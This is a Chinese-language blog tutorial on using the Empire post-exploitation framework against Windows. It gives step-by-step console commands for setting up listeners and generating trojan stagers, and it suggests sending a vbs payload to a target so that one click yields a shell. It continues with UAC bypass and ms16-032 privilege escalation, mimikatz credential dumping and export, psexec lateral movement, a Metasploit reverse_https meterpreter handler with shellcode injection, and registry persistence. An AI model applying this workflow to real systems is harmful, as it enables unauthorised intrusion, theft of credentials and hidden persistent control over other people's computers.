empire入门

简介:

参考文献:
http://www.freebuf.com/articles/network/175097.html
https://www.tuicool.com/articles/aQRJnqr
https://www.anquanke.com/post/id/87328
https://www.anquanke.com/post/id/87333

环境

ubuntu16.04
win10(所有防御都没关)

empire简介

Empire是一个针对windows平台的使用PowerShell脚本作为攻击载荷的渗透攻击框架,包括了从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。

安装

git clone https://github.com/EmpireProject/Empire.git
cd Empire
cd setup
./install.sh 
./reset.sh

设置监听

lsof -i:80       //查看端口
./empire          //打开Empire工具
listeners        //建立一个监听
uselistener     //设置采用何种模式,空格加双击Tab键可以看到一共有9种模式
uselistener http   //设置http监听模式
set Name test     //设置相应参数
set Host xxx.xxx.xxx.xxx
execute   //运行

生成木马

设置完监听,接着生成木马,输入usestager以后按下空格然后在按下tab键,可以看到总共是26个模块。其中multi为通用模块、osx为mac操作系统,还有linux与windows模块。 生成的文件类型有.dll,bat,vbs等。

1.launcher反弹shell代理

launcher python test


生成的内容直接贴到其他linux系统中

launcher powershell test


生成的内容直接贴到其他windows系统中(Username带有*的是已提权成功的代理)
2.vbs反弹shell代理

(Empire: listeners) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > set Listener test
(Empire: stager/windows/launcher_vbs) > execute

生成的vbs文件可以通过xftp下载,并发给你的攻击目标,只要对方一点,就可以拿到目标的shell了

PS:其他的操作类似就不再一一记录了

连接代理及基本使用

agents                         //回连的靶机
interact UIK16xxx     //interact命令跟上刚刚上线的主机Name的名,交互
shell net user       //使用cmd命令的时候,要使用`shell+命令`的格式
list stale          //查看已丢失的代理
remove stale       //移除已丢失的代理
sc                //目标截图
Download         //下载文件
upload          //上传文件
  • usemodule模块
(Empire: F76ADxxx) > usemodule
code_execution #代码执行
collection #信息收集模块、屏幕截图、键盘记录 、剪贴板记录等
credentials #密码凭据的获取和转储
exfiltration #指定ip进行端口扫描
lateral_movement #横向渗透模块
management #用来执行些系统设置,和邮件信息的收集
persistence #权限维持工具
privesc #权限提升
recon #侦察
situational_awareness #评估主机运行环境,网络运行环境
trollsploit #恶作剧
  • UAC提权模块
    这个需要给电脑上发文件,但是直接被查杀了
(Empire: agents) > interact A9U38xxx
(Empire: A9U38xxx) > usemodule privesc/bypassuac
(Empire: powershell/privesc/bypassuac) > set Listener test
(Empire: powershell/privesc/bypassuac) > execute
  • 使用Empire内置模块ms16-032提权
(Empire: A9U38xxx) > usemodule privesc/ms16-032
(Empire: powershell/privesc/ms16-032) > set Listener test
(Empire: powershell/privesc/ms16-032) > execute
  • 收集目标有用的信息
(Empire: A9U38xxx) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute
  • mimikatz模块(只能在windows的环境上使用)
mimikatz   //需要对带有*的权限才能获取系统账号密码
creds      //查看所有hash值包括明文,数据库中写入的各类凭据
creds export /root/1.csv   //导出hash凭证到指定的路径的格式
  • AllChecks模块(检查提权方法)
(Empire: A9U38xxx) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > execute
  • psexec模块横向生成一个反弹代理
(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName DESKTOP-14(`agents`命令下的`Username`的`\`前的名字)
(Empire: lateral_movement/invoke_psexec) > execute
Empire: lateral_movement/invoke_psexec) > agents
  • Empire和msf的联动
    利用Empire派生一个meterpreter的shell回来
    在msf下设置监听,通过https的方式反向连接。
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost xxx.xxx.xxx.xxx
set lport 443
exploit
3.png

同样empire也建立个监听

(Empire: agents) > interact A9U38xxx
(Empire: A9U38xxx) > usemodule code_execution/invoke_shellcode
(Empire: powershell/code_execution/invoke_shellcode) > set Lport 443
(Empire: powershell/code_execution/invoke_shellcode) > set Lhost xxx.xxx.xxx.xxx
(Empire: powershell/code_execution/invoke_shellcode) > execute
  • 权限维持(registry)
(Empire: 3K5AExxx) > usemodule persistence/elevated/registry*
(Empire: powershell/persistence/elevated/registry) > set Listener test
(Empire: powershell/persistence/elevated/registry) > execute

在windows注册表regedit HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug可以看到

目录
相关文章
|
机器学习/深度学习 算法 搜索推荐
"震撼揭秘!阿里云AIGC智能图像识别:黑科技如何颠覆你的视界,让图像识别秒变超能力,生活工作全面革新!"
【8月更文挑战第12天】在数字化浪潮中,图像数据激增,高效准确处理成为关键。阿里云智能图像识别服务(AIGC)应运而生,依托深度学习与计算机视觉技术,实现图像特征精确提取与理解。通过大规模数据训练及优化算法,AIGC在图像分类、目标检测等方面表现出色。其应用场景广泛,从电商的商品识别到内容安全审核,再到智能交通和医疗影像分析,均展现出巨大潜力。示例代码展示了AIGC图像生成的基本流程,彰显其技术实力与未来前景。
361 1
|
机器学习/深度学习 人工智能 自然语言处理
构建智能化编程助手:AI 在软件开发中的新角色
随着AI技术的发展,智能化编程助手正逐渐改变软件开发方式。本文介绍其核心功能,如代码自动补全、智能错误检测等,并探讨如何利用机器学习、自然语言处理及知识图谱等技术构建高效、易用的编程助手,提升开发效率与代码质量,同时讨论面临的技术挑战与未来前景。
|
数据格式
如何绘制热图?ggplot2入门笔记
如何绘制热图?ggplot2入门笔记
|
网络虚拟化 网络架构
三层交换机的详细配置步骤
三层交换机的详细配置步骤 1、三层交换机 三层交换机就是具有部分路由器功能的交换机,工作在OSI网络标准模型的第三层:网络层。三层交换机的最重要目的是加快大型局域网内部的数据交换,所具有的路由功能也是为这目的服务的,能够做到一次路由,多次转发。
3698 0
|
开发框架 资源调度 前端开发
Umi框架
Umi框架
649 0
|
机器学习/深度学习 编解码 算法
ICME 2023 | PACC: RTC 下基于用户感知的拥塞控制
ICME 2023 | PACC: RTC 下基于用户感知的拥塞控制
343 0
|
机器学习/深度学习 Web App开发 算法
强化学习(Reinforcement Learning)
强化学习(Reinforcement Learning)是机器学习的一个分支,旨在让智能体(agent)通过与环境的交互学习如何做出决策以最大化累积奖励。在强化学习中,智能体通过试错的方式与环境进行交互,并根据环境的反馈(奖励或惩罚)调整自己的行为。
334 2
|
存储 编解码 监控
基于Python的屏幕监控软件
屏幕监控软件的实现涉及到复杂的操作和权限,同时也涉及到隐私和合法性的问题。这是一个基于Python的小示例,展示如何使用第三方库pyautogui来截屏并保存截图
899 0
阿里云商标注册教程:新手自助申请详细步骤
阿里云商标注册图文教程快速上手笔记,本文以阿里云商标智能注册申请为例,商标智能注册申请需要用户手动填写商标类型、商标名称、商标图样、商标说明及商标分类表选择等操作,流程较为复杂,TM83商标网来详细说下阿里云商标注册快速上手笔记
1070 1
阿里云商标注册教程:新手自助申请详细步骤
|
数据挖掘
ArcGIS:如何进行栅格数据的拼接和裁剪、坡度坡向的提取、地形透视图的建立、等高线的提取、剖面图的创建?
ArcGIS:如何进行栅格数据的拼接和裁剪、坡度坡向的提取、地形透视图的建立、等高线的提取、剖面图的创建?
709 0